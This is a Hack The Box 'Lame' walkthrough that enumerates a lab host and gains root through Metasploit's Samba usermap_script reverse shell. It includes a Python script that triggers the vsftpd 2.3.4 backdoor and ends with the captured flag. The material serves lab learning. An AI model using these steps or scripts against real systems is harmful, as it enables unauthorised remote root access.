Lame is one of the easiest machines to pwn on Hack The Box, making it perfect for beginners. Let's jump in!
This writeup assumes that you have:
- Connected to the Hack The Box VPN or Pwnbox
- Spawned the machine "Lame", and have been provided with the target IP address
This writeup is part of a series of walkthroughs written for the following purposes:
- For others to read and learn from
- To help reinforce my own learning
- To help facilitate Hack The Box Meetups in Calgary CA
ping
Begin by testing your ability to communicate with the target using the ping command. The target IP address here is 10.10.10.3; the address assigned to your spawned instance may differ.
If you don't see that any of the packets have been received, check your Hack The Box VPN connection.
If you see that most or all packets are received, it's time to start exploring the target machine.
ping 10.10.10.3
PING 10.10.10.3 (10.10.10.3) 56(84) bytes of data.
64 bytes from 10.10.10.3: icmp_seq=1 ttl=63 time=64.0 ms
64 bytes from 10.10.10.3: icmp_seq=2 ttl=63 time=64.8 ms
64 bytes from 10.10.10.3: icmp_seq=3 ttl=63 time=73.7 ms
64 bytes from 10.10.10.3: icmp_seq=4 ttl=63 time=63.5 ms
--- 10.10.10.3 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3004ms
rtt min/avg/max/mdev = 63.462/66.493/73.748/4.214 ms
Enumeration
Begin the enumeration by scanning the target machine with Nmap. Use the -sV flag to enable service version detection.
Nmap reports that the host seems down but may be blocking its ping probes, and recommends the -Pn flag. The host clearly answers ICMP echo (see the ping above), so the likeliest explanation is that this scan ran without root privileges: unprivileged Nmap does host discovery with TCP SYN probes to ports 80 and 443 only, and both of those ports are filtered on this box.
nmap -sV 10.10.10.3
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-06 21:13 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.40 seconds
Disable host discovery
Try Nmap again using the -Pn flag.
We can see now that the host is up with the following open ports. Note that this output has no VERSION column, so it is effectively a plain port scan; service versions come from the next scan.
- 21: FTP
- 22: SSH
- 139: netbios-ssn
- 445: microsoft-ds
nmap -sV -Pn 10.10.10.3
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-06 21:21 EDT
Nmap scan report for 10.10.10.3
Host is up (0.086s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 9.50 seconds
Enable default Nmap Scripting Engine (NSE) scripts
This is all good information for us, but we could use more information about the services available on this box. Use Nmap again but this time include the -sC flag.
nmap -sV -sC -Pn 10.10.10.3
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-11 22:38 EDT
Nmap scan report for 10.10.10.3
Host is up (0.084s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.16.2
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2024-10-11T22:40:56-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 2h01m34s, deviation: 2h49m45s, median: 1m31s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.46 seconds
Metasploit console
Including the -sC flag has provided us with much more information, including the FTP banner vsftpd 2.3.4. That release is notorious because its official source tarball was trojaned in 2011 (CVE-2011-2523): when a USER name contains ":)", the server opens a root shell listening on TCP port 6200. Let's start Metasploit using the msfconsole command.
msfconsole
=[ metasploit v6.4.9-dev ]
+ -- --=[ 2420 exploits - 1248 auxiliary - 423 post ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 >
Search known vulnerabilities
To begin using the Metasploit framework, use the search command to find exploit modules for a particular service and version. Include the name of the service and the version, in this case vsftpd 2.3.4.
This Metasploit console search returns a Backdoor Command Execution exploit named vsftpd_234_backdoor.
msf6 > search vsftpd 2.3.4
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 >
Select module by index
To begin using a Module found with search, type the use command followed by either the index number or the name of the module.
You should now see the Metasploit console prompt includes exploit(unix/ftp/vsftpd_234_backdoor), meaning that the Module is loaded and that we can begin to use it.
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
Show options
Continue in the Metasploit console with the show options command, which shows the settings we can configure for a Module before running it against a target. For example, we need to define the IP address of the target we are attacking using the RHOSTS option.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
Set RHOSTS
We need to tell the Metasploit console which IP addresses we want to target using this Module. The RHOSTS configuration option accepts either a single IP address, or a list of IP addresses we can set as targets.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
Check RHOSTS is set
Check that RHOSTS has been set by running the show options command again. This time you should see the target IP address configured for the RHOSTS option.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.3 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
Run exploit
It's time to attempt exploiting the target machine using the loaded Module. Use the exploit command within the Metasploit console to launch the vsftpd_234_backdoor attack!
Unfortunately, this exploit does not get us a shell on this machine. The last line of output says the exploit completed but no session was created: the module sent the ":)" username and got the expected 331 reply, but it could not reach the backdoor shell on TCP port 6200. The usual explanation on Lame is that the host firewall blocks that port, so the backdoor fires but its shell is unreachable from us. You can check this yourself with nmap -Pn -p 6200 10.10.10.3 right after running the module: a port reported as filtered rather than open means the firewall is in the way.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
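It helps to separate the two halves of that failed exploit: triggering the backdoor over FTP, and reaching the shell it opens. The script below is an added example written for this writeup, not Metasploit's module code. It speaks the same FTP lines the module does (the banner and the USER/331 exchange shown above), then tries TCP port 6200 and treats a refused or timed-out connection as "no shell", which is exactly the no-session outcome above. The fake server at the end is a constructed stand-in so the script can be run offline; the target host, the ports and the ":)" username are the only assumptions.

```python
"""Trigger the vsftpd 2.3.4 backdoor by hand and check whether its shell port answers.

Added example for this writeup, not Metasploit's code. The trojaned 2.3.4
tarball (CVE-2011-2523) opens a root shell on TCP 6200 when the FTP USER name
contains ":)". Splitting the steps shows which one fails on a given target.
"""
import socket
import sys
import threading

BACKDOOR_PORT = 6200


def trigger_backdoor(host, port=21, timeout=5.0):
    """Log in with a smiley-face username; return (banner, reply to USER)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("rb")
        banner = f.readline().decode(errors="replace").strip()
        s.sendall(b"USER anonymous:)\r\n")
        user_reply = f.readline().decode(errors="replace").strip()
        # 2.3.4 stalls on PASS once the backdoor path is taken; do not wait for a reply.
        s.sendall(b"PASS anything\r\n")
    return banner, user_reply


def backdoor_reachable(host, port=BACKDOOR_PORT, timeout=3.0):
    """True if a shell on `port` accepts a connection and answers `id`.

    A refused connection (port closed) and a timeout (port filtered by a
    firewall, the usual finding on Lame) both count as unreachable.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            s.sendall(b"id\n")
            return b"uid=" in s.recv(256)
    except OSError:  # ConnectionRefusedError and socket.timeout are both OSError
        return False


def start_fake_vsftpd():
    """Constructed stand-in for offline testing: a loopback 'vsftpd' that serves a
    fake shell port once it sees ":)" in the username. Returns (ftp_port, shell_port)."""
    ctrl = socket.socket()
    ctrl.bind(("127.0.0.1", 0))
    ctrl.listen(1)
    shell = socket.socket()
    shell.bind(("127.0.0.1", 0))
    shell.listen(1)

    def shell_loop():
        conn, _ = shell.accept()
        with conn:
            conn.recv(64)
            conn.sendall(b"uid=0(root) gid=0(root) groups=0(root)\n")

    def ctrl_loop():
        conn, _ = ctrl.accept()
        with conn:
            conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
            user_line = conn.makefile("rb").readline()
            conn.sendall(b"331 Please specify the password.\r\n")
            if b":)" in user_line:
                threading.Thread(target=shell_loop, daemon=True).start()

    threading.Thread(target=ctrl_loop, daemon=True).start()
    return ctrl.getsockname()[1], shell.getsockname()[1]


if __name__ == "__main__":
    if len(sys.argv) > 1:  # real target: python3 vsftpd_check.py 10.10.10.3
        host, ftp_port, shell_port = sys.argv[1], 21, BACKDOOR_PORT
    else:  # no argument: exercise the constructed fake server
        host = "127.0.0.1"
        ftp_port, shell_port = start_fake_vsftpd()
    banner, reply = trigger_backdoor(host, ftp_port)
    print(f"banner: {banner}\nUSER reply: {reply}")
    if backdoor_reachable(host, shell_port):
        print(f"backdoor shell reachable on {host}:{shell_port}")
    else:
        print(f"no shell on {host}:{shell_port} (closed or filtered)")
```

Against the fake server the shell is reachable; against a target whose port 6200 is filtered, trigger_backdoor still returns the 331 line and backdoor_reachable returns False after the timeout, which is the same picture Metasploit summarises as "no session was created".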
Exit Metasploit console
Our attempt to exploit the target machine using the Module found in the Metasploit console has failed. We will need to gather more information about the target machine.
Return to the default Linux command-line interface using the exit command. This will close our session within the Metasploit console.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exit
No output. You will be returned back to the default Linux command line.
Enumeration #2
Re-run the same Nmap command as before, with the -sV, -sC, and -Pn flags. The output is the same as the earlier scan apart from the timestamps, and it already names the other candidate for getting in: Samba smbd 3.0.20-Debian on ports 139 and 445, with SMB message signing disabled and a guest account accepted.
nmap -sV -sC -Pn 10.10.10.3
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-11 23:25 EDT
Nmap scan report for 10.10.10.3
Host is up (0.078s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.16.2
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2024-10-11T23:27:03-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2h01m35s, deviation: 2h49m45s, median: 1m32s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.98 seconds
Metasploit console #2
Return back to the Metasploit console using the msfconsole command to search for more exploit modules. After running this command you will once again see the default Linux command-line interface replaced by the Metasploit framework command-line interface.
msfconsole
=[ metasploit v6.4.9-dev ]
+ -- --=[ 2420 exploits - 1248 auxiliary - 423 post ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 >
Search Samba
Use the Metasploit search command again to find exploit Modules for Samba version 3.0.20.
Metasploit returns a module named usermap_script. It targets CVE-2007-2447: Samba 3.0.20 through 3.0.25rc3 passed the SMB username to the configured "username map script" through a shell without escaping it, so a username containing backticks or other shell metacharacters runs commands on the server, and no valid credentials are needed. Let's attempt to use this module against the target machine to gain access.
msf6 > search samba 3.0.20
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
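To see why this module works and why it needs no credentials, here is an added example (not Samba's or Metasploit's code) that models the flaw on your own machine. It uses echo in place of an administrator's map script and runs only against constructed usernames: the vulnerable function splices the username into a shell command line as Samba 3.0.20 did, the fixed one passes it as a single argument with no shell, and a strict allow-list check is added as a second line of defence. Metasploit's module sends a username of the shape /=`nohup <payload>` so the spawned shell outlives the SMB request; the example uses a harmless echo instead of a payload. Because smbd runs as root, whatever the injected username executes runs as root, which is why the shell on this box later arrives as root.

```python
"""Model of CVE-2007-2447: Samba's "username map script" run through a shell.

Added example for this writeup, not Samba's or Metasploit's code. `echo`
stands in for the administrator's map script; the usernames are constructed.
"""
import re
import subprocess

SAFE_USERNAME = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def map_username_vulnerable(username, script="echo"):
    """Samba 3.0.20 behaviour: the username is interpolated into a shell
    command line, so backticks, $( ) and ; inside it are executed by /bin/sh."""
    cmdline = f"{script} {username}"
    return subprocess.run(cmdline, shell=True, capture_output=True, text=True).stdout


def map_username_fixed(username, script="echo"):
    """Fix: hand the username to the script as one argv element. No shell
    parses it, so metacharacters arrive as literal bytes."""
    return subprocess.run([script, username], capture_output=True, text=True).stdout


def is_safe_username(username):
    """Defence in depth: reject anything outside a strict allow-list before it
    reaches any script at all."""
    return SAFE_USERNAME.fullmatch(username) is not None


if __name__ == "__main__":
    # Same shape Metasploit's usermap_script sends, with a harmless echo as the payload.
    injected = "/=`echo INJECTED`"
    print("vulnerable:", map_username_vulnerable(injected).rstrip())  # /=INJECTED
    print("fixed:     ", map_username_fixed(injected).rstrip())       # /=`echo INJECTED`
    print("allowed?  ", is_safe_username(injected), is_safe_username("alice"))
```

The vulnerable path prints /=INJECTED because /bin/sh evaluated the backticks before echo ever saw the argument; the fixed path prints the username byte for byte. Any username that survives is_safe_username could not carry either payload in the first place.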
Select module #2
Once again we can select the module we want to use by executing the use command. Remember to also specify the name or index number of the module, which in this case is 0.
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
Show options #2
Once again, check what options are available for configuration in this module by executing the show options command.
Remember that show options describes which options are required for this module. In our case we will need to configure RHOSTS and LHOST: the default payload is a reverse shell (cmd/unix/reverse_netcat), and LHOST has defaulted to 10.0.2.15, the eth0 address of the attacking VM, which the target cannot reach across the VPN.
msf6 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Set RHOSTS #2
Once again we set the RHOSTS module option using set rhosts.
Although we could specify multiple targets, we only specify a single IP address here: the address of the machine spawned by Hack The Box.
You will then see the new RHOSTS value echoed back by the Metasploit console.
msf6 exploit(multi/samba/usermap_script) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
Check RHOSTS is set #2
If you want to be sure that RHOSTS is properly configured, execute the show options to output the updated configuration.
msf6 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.3 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Get local IP address
In order to establish a shell connection between our machine and the target, we need to give the Metasploit console not only the target IP address but also the IP address of our own machine within the Hack The Box Virtual Private Network (VPN), because the payload makes the target connect back to us.
There are two ways to find this IP address for the Metasploit console:
- Run ip a and use the IPv4 address listed under tun0. Use only the dotted address, without the slash and the prefix length after it (10.10.16.2, not 10.10.16.2/23).
- Your IP address within the VPN is also shown in the Hack The Box web interface.
msf6 exploit(multi/samba/usermap_script) > ip a
[*] exec: ip a
1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:d2:26:79 brd ff:ff:ff:ff:ff:ff
inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic noprefixroute eth0
valid_lft 78354sec preferred_lft 78354sec
inet6 fe80::9e44:e714:455e:6578/64 scope link noprefixroute
valid_lft forever preferred_lft forever
3: tun0: mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 10.10.16.2/23 scope global tun0
valid_lft forever preferred_lft forever
inet6 dead:beef:4::1000/64 scope global
valid_lft forever preferred_lft forever
inet6 fe80::eb30:57df:47f6:f930/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever
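Picking the wrong LHOST is the most common reason this module reports a started handler and then nothing. The added example below (not from the original writeup) parses ip a output and returns the tun0 address with the /23 prefix length stripped, which is the value set lhost needs. The embedded sample is a constructed copy of the ip a output above with the interface flag fields, which were lost from the page, left out; current_lhost() runs the real ip a on your machine.

```python
"""Extract the VPN (tun0) IPv4 address from `ip a` output for Metasploit's LHOST.

Added example for this writeup. Metasploit defaulted LHOST to 10.0.2.15 (eth0),
which the target cannot reach; the reverse shell must call back to tun0.
"""
import re
import subprocess

# Constructed sample mirroring the `ip a` output in the writeup (flag fields omitted).
SAMPLE_IP_A = """\
1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute
       valid_lft forever preferred_lft forever
2: eth0: mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:d2:26:79 brd ff:ff:ff:ff:ff:ff
    inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic noprefixroute eth0
       valid_lft 78354sec preferred_lft 78354sec
    inet6 fe80::9e44:e714:455e:6578/64 scope link noprefixroute
       valid_lft forever preferred_lft forever
3: tun0: mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    link/none
    inet 10.10.16.2/23 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 dead:beef:4::1000/64 scope global
       valid_lft forever preferred_lft forever
"""


def iface_ipv4(ip_a_output, iface="tun0"):
    """Return the first IPv4 address on `iface` without its /prefix, or None."""
    # Each interface block starts with "<index>: <name>:" at the beginning of a line
    # and runs until the next such header (or the end of the output).
    block = re.search(
        rf"^\d+: {re.escape(iface)}:.*?(?=^\d+: |\Z)", ip_a_output, re.M | re.S)
    if not block:
        return None
    m = re.search(r"^\s*inet (\d{1,3}(?:\.\d{1,3}){3})/\d+", block.group(0), re.M)
    return m.group(1) if m else None


def current_lhost(iface="tun0"):
    """Run `ip a` on this machine and return the address to use for LHOST."""
    out = subprocess.run(["ip", "a"], capture_output=True, text=True, check=True).stdout
    return iface_ipv4(out, iface)


if __name__ == "__main__":
    print("sample tun0:", iface_ipv4(SAMPLE_IP_A))          # 10.10.16.2
    print("sample eth0:", iface_ipv4(SAMPLE_IP_A, "eth0"))  # 10.0.2.15
    try:
        print("this host tun0:", current_lhost())
    except (FileNotFoundError, subprocess.CalledProcessError):
        print("ip(8) not available on this machine")
```

current_lhost() returning None means there is no tun0 address at all, which is the VPN-not-connected case from the ping section rather than a Metasploit problem.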
Set LHOST
Use the set lhost command to set the LHOST for this Metasploit module. Make sure to provide the IP address captured within the last step.
msf6 exploit(multi/samba/usermap_script) > set lhost 10.10.16.2
lhost => 10.10.16.2
Run exploit #2
It's time to launch the attack against our target. Once again, use the exploit command to run this Metasploit module.
The output shows that the module started a reverse TCP handler on our tun0 address and port 4444, and that a command shell session opened when the target connected back to it from 10.10.10.3:44118.
msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 10.10.16.2:4444
[*] Command shell session 1 opened (10.10.16.2:4444 -> 10.10.10.3:44118) at 2024-10-12 13:28:13 -0400
"I'm in"
We have established a command shell session on the target machine. Check which user we are logged in as using the whoami command. The output confirms that we are root: Samba's smbd runs as root, and the username map script it launches inherits those privileges, so the injected command did too. There is no separate privilege escalation step on this box.
Go ahead and say it...
whoami
root
Search for root.txt #1
It's time to search for root.txt. Begin exploring the target machine by using the ls command, which lists the directories and files within current working directory.
See the root directory? That looks promising.
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
initrd.img.old
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
Search for root.txt #2
Traverse to the root directory using the cd command. This changes the current working directory to /root.
Once again, list the contents of the current working directory using the ls command.
We have found root.txt!
cd root
ls
Desktop
reset_logs.sh
root.txt
vnc.log
Print root.txt to output
We're almost done. Print the contents of root.txt to the command line using the cat command.
Copy the text from the output and submit the flag through Hack The Box.
cat root.txt
6d9cf83846252d1b3ec362e1a347e9a6